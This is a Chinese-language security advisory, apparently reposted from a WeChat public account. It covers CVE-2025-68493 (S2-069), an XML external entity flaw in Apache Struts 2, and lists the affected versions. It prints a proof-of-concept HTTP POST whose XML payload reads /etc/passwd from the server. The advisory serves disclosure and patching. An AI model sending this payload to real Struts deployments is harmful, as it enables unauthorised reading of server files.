文章总结： ThisdocumentdetailsCVE-2025-68493,anXXEvulnerabilityidentifiedasS2-069inApacheStruts2affectingversionsfrom2.0.0to6.1.0.TheflawarisesfrominsufficientvalidationofXMLexternalentitiesduringparsing.AttackerscanexploitthisviamaliciousXMLrequeststoreadsensitivefiles,causeDoS,orperformSSRF.APOCdemonstratingfilereadingisprovided.UsersareadvisedtoupdatetheirStruts2frameworktoasecureversionimmediatelytomitigatetheriskofdataleakage. 综合评分： 86 文章分类： 漏洞分析,漏洞POC,漏洞预警,WEB安全

CVE-2025-68493｜Apache Struts 2(S2-069)外部实体（XXE）注入漏洞（POC）

alicy alicy

信安百科

2026年1月25日 09:01 河北

0x00 前言

Apache Struts 2是Apache软件基金会开发的开源Java Web框架，采用 MVC架构，融合Struts与WebWork技术。

它通过拦截器处理请求，支持OGNL表达式语言和可重用标签API，具备良好的AJAX支持和线程安全性，广泛应用于企业级Java EE网络应用程序开发。

0x01 漏洞描述

漏洞源于XWork在解析XML配置文件时，未对XML外部实体进行充分校验与限制，导致攻击者可通过构造恶意XML内容触发外部实体解析。成功利用后，可能造成敏感数据泄露、拒绝服务（DoS）以及服务器端请求伪造（SSRF）等安全影响。

0x02 CVE编号

CVE-2025-68493（S2-069）

0x03 影响版本

Apache Struts&nbsp;[>= 2.0.0, <= 2.3.37];Apache Struts&nbsp;[>= 2.5.0, <= 2.5.33];Apache Struts&nbsp;[>= 6.0.0, <= 6.1.0];

0x04 漏洞详情

POC：

来源于网络：
POST/struts2-xml-parser/xmlParserNoDtdParseHTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/143.0.0.0Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencoded
<?xml version="1.0"?><!DOCTYPE&nbsp;foo&nbsp;[<!ENTITY&nbsp;xxe&nbsp;SYSTEM&nbsp;"file:///etc/passwd">]><root>&xxe;</root>

0x05 参考链接

https://cwiki.apache.org/confluence/display/WW/S2-069

推荐阅读：

CVE-2026-21440｜AdonisJS远程代码执行漏洞（POC）

CVE-2025-52691｜SmarterMail 未授权文件上传漏洞（POC）

CVE-2024-57521｜RuoYi v4.7.9认证用户SQL注入漏洞（POC）

Ps：国内外安全热点分享，欢迎大家分享、转载，请保证文章的完整性。文章中出现敏感信息和侵权内容，请联系作者删除信息。信息安全任重道远，感谢您的支持！！！

本公众号的文章及工具仅提供学习参考，由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害，均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：信安百科 alicy alicy《CVE-2025-68493｜Apache Struts 2(S2-069)外部实体（XXE）注入漏洞（POC）》